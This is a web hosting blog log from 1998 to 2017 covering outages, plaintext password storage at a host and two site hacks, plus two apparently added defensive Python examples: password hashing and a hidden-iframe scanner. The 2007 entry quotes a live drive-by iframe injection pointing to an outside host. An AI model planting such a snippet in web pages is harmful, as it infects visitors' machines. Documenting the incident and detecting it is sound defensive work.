NOTE: If you take one thing away from this blog, take away this: use different
companies for your website hosting and domain name registration. See the highlighted text below.
May 2017: Bluehost Stores Passwords in the Clear(!)
I've experienced my first real disappointment with Bluehost. They store all of the user
account passwords in the clear so that their techs can use them as
verification that you are who you say you are in live chat. See my conversation
during a live chat with a Bluehost tech support person on 20 May 2017 below.
This is so disappointing. For those who
do not know, ANY reputable company immediately encrypts (hashes) your password after
you type it in and NEVER knows what it actually is. All they should be able to do
is reset it. They should NOT be able to tell you what it is. For a reputable hoster
to be showing passwords to all of their techs, in the clear, is very troubling.
Welcome To Live Chat
5:20:26 PM
Pramod J: Hello Willus.com, thank you for contacting us. My name is Pramod. How are you Today?
5:21:02 PM
Willus.com: Fine. I cannot access my account through SSH terminal or ftp, like I usually can. The ssh server is down maybe?
5:21:54 PM
Pramod J: Could I get the last 4 characters of the cPanel password to verify ownership of the account?
5:22:27 PM
Willus.com: You can see my cpanel password in the clear?
5:26:29 PM
Pramod J: I didn't get you, I need only last 4 digits and password will be saved only till the chat is active
5:27:14 PM
Willus.com: Can you see my entire password? In the clear?
5:31:20 PM
Willus.com: Hello?
5:33:01 PM
Pramod J: yes
5:33:16 PM
Willus.com: Yes what?
5:34:09 PM
Pramod J: I see it in clear
5:34:16 PM
Pramod J: it is not encrypted
5:34:20 PM
Willus.com: I would like to talk to a supervisor
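The storage model described above (the site keeps only a salted hash, can reset a password but can never display it), as an added example that is not from the original post or from Bluehost. The `Account` class, the scrypt parameters and the one-time support PIN used in place of "last 4 characters of the password" are assumptions of this example.

```python
import hashlib
import hmac
import secrets
import time

# scrypt cost parameters are an assumption for this example; tune them per host.
SCRYPT = dict(n=2**14, r=8, p=1, dklen=32)


def hash_secret(secret: str) -> dict:
    """Build the stored record: a random salt and the scrypt digest only."""
    salt = secrets.token_bytes(16)
    digest = hashlib.scrypt(secret.encode(), salt=salt, **SCRYPT)
    return {"salt": salt.hex(), "hash": digest.hex()}


def verify_secret(record: dict, candidate: str) -> bool:
    """Re-derive the digest from the candidate and compare in constant time."""
    salt = bytes.fromhex(record["salt"])
    digest = hashlib.scrypt(candidate.encode(), salt=salt, **SCRYPT)
    return hmac.compare_digest(digest, bytes.fromhex(record["hash"]))


class Account:
    """Hypothetical account record: nothing stored here reveals the password."""

    def __init__(self, password: str):
        self.password = hash_secret(password)
        self.support_pin = None  # (hashed PIN record, expiry time) or None

    def login(self, password: str) -> bool:
        return verify_secret(self.password, password)

    def reset_password(self, new_password: str) -> None:
        self.password = hash_secret(new_password)  # replace, never reveal

    def issue_support_pin(self, now=None, ttl=900) -> str:
        """Shown once to the logged-in owner, who reads it to the chat tech."""
        now = time.time() if now is None else now
        pin = f"{secrets.randbelow(10**6):06d}"
        self.support_pin = (hash_secret(pin), now + ttl)
        return pin

    def check_support_pin(self, pin: str, now=None) -> bool:
        """Single use: the PIN is cleared after any attempt, right or wrong."""
        now = time.time() if now is None else now
        record, expiry = self.support_pin or (None, 0)
        self.support_pin = None
        return record is not None and now <= expiry and verify_secret(record, pin)
```

With this layout a support tool has no password characters to ask for or display; the tech only learns whether the PIN the customer read out was valid.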
September 2016: Smooth Sailing Since 2014
Willus.com is still hosted by
BlueHost.com, and willus.org is hosted by
DreamHost.com, as they have been since 2014.
These companies have both proven to have reliable uptime and service over the last
2.5 years, and at reasonable prices.
December 2013: Unprofessional Parting
CWIHosting.com, as I half expected, sent me an invoice by e-mail on 12/1/2013, my renewal date,
despite the fact that I had requested account cancellation two weeks before via multiple
methods. All of their phone numbers are disconnected, and despite
multiple subsequent cancellation requests (including by postal mail), they repeatedly
e-mailed me invoice reminders--five in all
over the course of eight days, but they finally stopped, with the last e-mail from them
threatening to suspend my account(!).
There just doesn't
seem to be anybody home there. Fortunately they had no way to extract money
from me because I long ago removed any payment methods from my account.
Subsequent searches on the web
(and multiple e-mails to me from other customers who have seen this blog)
reveal that other people have had similar
problems trying to part ways with CWIHosting.com. I recommend that you stay away
from CWIHosting.com.
November 15, 2013: Goodbye, CWIHosting.com.
I don't know what's happened with CWIHosting.com. I kind of feel bad for them, because
they've apparently got some systemic problem that they can't figure out which
caused my web site to go down three times in a span of a month, each time for well over
24 hours, and one time for almost two weeks (incomprehensible to me--see next entry).
The most recent time (November 12) was the
final straw for me. I can't be their guinea pig while they figure things out.
They also made a habit of taking away my access to gcc and making me ask them to
restore it--they pulled that little stunt at least four times over the last ten years.
They'd eventually restore it each time, but not without considerable aggravation on my part.
So I've finally cancelled my account with them. It's too bad--I liked their service in most other
respects. Their trouble ticket system is far better than Bluehost's, for example, but
this uptime issue (and their response to it) has become unacceptable.
Willus.com is now hosted by
BlueHost.com, and willus.org is hosted by
DreamHost.com.
My experience
with CWIHosting.com (and before that, Prentice Internet) confirms
that one of the smartest things you can do if you run a personal web site is to
separate your domain name registration from your web site hosting (i.e. use different
companies for each).
That way if you get upset with your hosting service, you don't also
have to move your domain name registration if you want to completely part ways with them.
You can completely independently point your name to a new hosting service.
October 18, 2013: Hoster #3: Bluehost.com.
On October 4, 2013, my web site as hosted on cwihosting.com went down and it was not until
October 17, 2013 that they restored full access to me (and they still have not restored my
access to gcc). They apparently had both the main
server and the backup server fail at the same time (how lucky!).
This is what I heard from cwihosting.com at various times:
October 12, 2013
Thank you for your patience.
The restoration is still going on and will be completed soon.
Please stand by for updates.
October 10, 2013
We apologize for the recent outage that has affected your service. Please be assured we are working as quickly as possible to restore service. Unfortunately a double equipment failure has delayed the process. However we are about 80% complete in restoring access. We still have data current up into the day the outage occurred.
October 8, 2013
The server is down due to a degraded RAID array. We have got the following message from our DC floor engineers.
We are aware of the situation and are working to resolve the issue. Unfortunately the backup server crashed at same time and we were unable to retrieve the backups. This means we are having to manually copy the files to new drives from the degraded array.
We are unable to make a backup now.
I've learned my lesson and will set up my site to auto-mirror to willus.org, hosted by BlueHost.com. BlueHost (data center located in Utah) has an A+ rating from the BBB (cwihosting is not affiliated with the BBB). I poked around on the web and read some reviews before selecting them, but they're not perfect. Already my BlueHost site has been down twice for more than a few minutes, and their support ticket system is not as good as cwihosting's. Once you've submitted, there's no way to edit your ticket or add more information, and most of their responses have not been helpful. They are typically one sentence responses along the lines of "Did you try this?" (which I tried and didn't work), or "Sorry, we can't do that." But the site is functional, I have the tools I need to make it a fully functioning mirror, and it's quite a bit less expensive than cwihosting.
March 18, 2008: Hacked again.
This time it was a malicious script uploaded by another user. See the response from my ISP:
Your shared hosting server had a user that unknowingly uploaded an
exploitable script. It was a postnuke (blogging system) module called
gallery. Though CWI provides industry leading security for shared
hosting and locks the server down as best as possible while still being
flexible to the needs of its users, resources are still shared. For
this reason, one user uploading an exploitable script, is like opening a
back door to the server, giving an unknown person the keys.
This was a
low risk attack as it was caught within 10 minutes and are usually used
to run simple scripts that are more of an annoyance than anything else.
To be sure, we have reinstalled items on the server to make sure nothing
was left altered on the system, and have suspended the account that
started the incident so that we can make other arrangements for them.
We are also working on a script that can detect and remove .bad. files
and out of date script versions uploaded by actual server users.
To fix
your site, you simply need to replace your index file, at this time it
seems like no other files were affected. If you need further
assistance, please let us know. Thank you for your understanding.
Sincerely,
Jason A. Taylor
Chief Technical Officer
CWI Hosting.com
Yes, they caught it in 10 minutes, but CWI hosting never did the
courtesy of sending me an e-mail that this had happened (thanks!),
so I found out five days later when a friend let me know that my home page
had been hacked.
July 2007: Willus.com hacked!
On July 24, 2007, I discovered that
several of my HTML files on willus.com had been altered the night
before. Somebody had gained FTP access to my site and added lines like
this to my HTML files:
<!-- o4 --><iframe
src="http://t.fala.org.ua/" width=1 height=1
style="display:none"><!-- c4 -->
The .ua
country code is Ukraine. After contacting tech support at CWI hosting,
I was informed that the attack was coming from Hong Kong and that
they'd seen this before. The tech suggested that I may have FTP'd to my
site from a compromised PC that captured my password and sent it to the
machine in Hong Kong. I immediately changed my password and now
only FTP to my machine using secure FTP (using psftp.exe from the putty package). I also wrote a program to fix my infected
HTML files. Apparently the extra line in the infected files causes
vulnerable versions of Internet Explorer to infect PCs with the program
that captures the passwords, and this would be how the thing spreads.
That's my guess, anyway. Searching the web didn't yield much. Near as
I can tell, this is related to the Trojan-Downloader.Win32.Small.evh
virus, but I can't tell for sure. If anybody else has seen something
like this, I'd appreciate an e-mail. This one really surprised me. It
is the first time I've clearly had a password taken from right
underneath my nose.
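One way to find and strip the kind of injected line shown above, as an added example (not the program the author wrote). It generalizes from the quoted `<!-- o4 -->` ... `<!-- c4 -->` snippet to any invisible or 0/1-pixel `<iframe>`; the sample page, its placeholder hosts and the `.infected` backup suffix are constructed for illustration.

```python
import re
from pathlib import Path

# <iframe> opening tag, optionally wrapped in "<!-- oN -->" / "<!-- cN -->" markers.
IFRAME = re.compile(
    r"(?:<!--\s*o\d+\s*-->\s*)?<iframe\b(?P<attrs>[^>]*)>"
    r"(?:\s*</iframe\s*>)?(?:\s*<!--\s*c\d+\s*-->)?", re.IGNORECASE)
SRC = re.compile(r"""src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)
CSS_HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
TINY = re.compile(r"""(?<![\w-])(?:width|height)\s*=\s*["']?[01](?!\d)""", re.IGNORECASE)

# Constructed sample: the injection pattern (placeholder host) beside a normal embed.
SAMPLE = ('<html><body><h1>Home</h1>\n<!-- o4 --><iframe\n'
          'src="http://injected.example/" width=1 height=1\n'
          'style="display:none"><!-- c4 -->\n<iframe src="https://maps.example/embed"'
          ' width="600" height="400"></iframe>\n</body></html>\n')

def is_hidden(attrs: str) -> bool:
    """True when the frame is styled invisible or sized 0 or 1 pixel."""
    return bool(CSS_HIDDEN.search(attrs) or TINY.search(attrs))

def clean_html(text: str):
    """Return (text without hidden iframes, list of the src URLs removed)."""
    removed = []
    def repl(match):
        attrs = match.group("attrs")
        if not is_hidden(attrs):
            return match.group(0)  # visible embeds are left alone
        src = SRC.search(attrs)
        removed.append(src.group(1) if src else "(no src)")
        return ""
    return IFRAME.sub(repl, text), removed

def scan_tree(root: str, fix: bool = False) -> dict:
    """Report hidden iframes in .htm/.html files; rewrite them only if fix=True."""
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.suffix.lower() not in (".htm", ".html") or not path.is_file():
            continue
        original = path.read_text(encoding="utf-8", errors="replace")
        cleaned, removed = clean_html(original)
        if removed:
            findings[str(path)] = removed
            if fix:  # keep the infected copy for later analysis
                path.with_name(path.name + ".infected").write_text(original, encoding="utf-8")
                path.write_text(cleaned, encoding="utf-8")
    return findings
```

Run `scan_tree(root)` read-only first and review the reported URLs before calling it with `fix=True`.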
July 2005: CWI-Hosting Review--still doing well
The aftermath of the server crash was somewhat trying. I had to open
several trouble tickets with CWI to get privileges that I had on the
server before it crashed. For example, they set me up in a restricted,
"jail shell" with no access to gcc.
I could understand that they wanted to have
a secure system, but they tried to deny me services that their web page
clearly advertises as being part of my plan.
After eventually corresponding with the
head of CWI's tech department (who was very pleasant), I had my
full privileges restored.
Since then, I've had no issues. On the plus side, CWI has steadily
been increasing my plan's disk storage quota. It is now over 1 GB,
which gives me plenty of room and is hard to beat for the price I'm
paying ($175/yr).
March 2005: CWI-Hosting server crash
Server crash. The server that CWI was using to host willus.com crashed
this month, and the dust is still settling. The server has been
very sluggish ever since coming back up on 3-21. Read here for more details.
February 2005: CWI-Hosting doing well
After over one year with CWI
Hosting, I have no regrets. My web site has been up every time I've
needed it, and they gave me all the features that were promised on
their web site, though I had to make more than one request to get
access to gcc so that I could compile my own CGI codes for my web
page. In general, the CWI support center has been very responsive.
November 2003: A poor review for Prentice-Internet
I no longer use
Prentice Internet for
my web hosting. I am now using
CWI Hosting
(starter plan, $17.50/mo). Prentice had a history of doing things
to my account unannounced (like resetting my password) and then
apologizing after the fact rather than giving me any warning ahead of time.
In the latest
incident, just last month, they deleted an important file of
mine while running e-mail tests on my account without my knowledge
or permission.
Though I believe it was not done maliciously (they were trying to figure
out an e-mail problem I was having), it was still an important file.
What made things much worse, however, was
when I repeatedly e-mailed Prentice asking them to restore the file,
and they would not
respond in any way. They don't seem to be answering any of my e-mails anymore.
Though at times Prentice has shown me excellent service, there
have been too many occasions like I have just described, and this
last case finally inspired me to look for a new hoster.
CWI Hosting has a polished web site and so far (two weeks of service)
they have quickly responded to questions I've had.
The transition
has been painless.
March 2001: Useful links
Here are two useful sites for understanding
how internet numbers and addresses are assigned:
ICANN (Internet Corporation for
Assigned Names and Numbers) and ARIN
(American Registry for Internet Numbers). Also, you can go
to Netcraft.com to get
information about a web site (what platform it is running and who
is hosting it).
July 2000: Cable modem is great.
I've now been using cable modem for about
six months ($47/mo including rental of the modem). I will never go back
to dial-up. Cable modem (and DSL, I suspect) is so much nicer. It
doesn't tie up your phone, there is no waiting for a connection, no busy
signal, and it's fast (typical 100-400Kbytes/s downloads). My website
service is still provided by
Prentice.
They've done an excellent job
and have virtually never had down time that I've been aware of. And
they are still $17/mo for 300 MB of disk space. That's
very hard to beat.
October 1998: The search for a hoster
I run my web site from home. I run it solely to share information and have some fun.
I started by checking to see if the domain name I wanted (willus.com)
had been taken.
You can get information on domain names by going
to internic.net and entering
the domain name.
Registering a domain name with Internic
is $70 for the first two years and $35/year
thereafter. But to register, you'll need a web hosting service.
Update 8/00: The Internet Corporation for Assigned Names and Numbers
(ICANN)
has now set it up so that you may now choose from any of
several "accredited
registrars" who can set up your domain name. This, in effect, has
commercialized this part of the Internet business, which is driving
the registration fee down a bit. I recently re-registered through
my service provider (Prentice)
for $20/year.
Web hosting services provide you with the internet
IP number for your domain name and an account on a computer
where you can store your web pages. Some also provide you with
a dial-up connection, but usually you have to get that separately.
For example, I use
Prentice-Internet for
my web hosting and Cox Cable for
my connection (cable modem).
There are literally hundreds of web hosters to choose from.
I found budgetweb.com
to be a great source of information on web hosting services. They have
a comprehensive list of features for hundreds of web hosters. Selecting
from this list, I first tried
smarthosting.com, but ended up
transferring to
Prentice
because they had more exactly what I wanted, but both are good
services that give you about 300 MB for about $20-$25/month.
If you have any more questions about how I run my site, send an e-mail.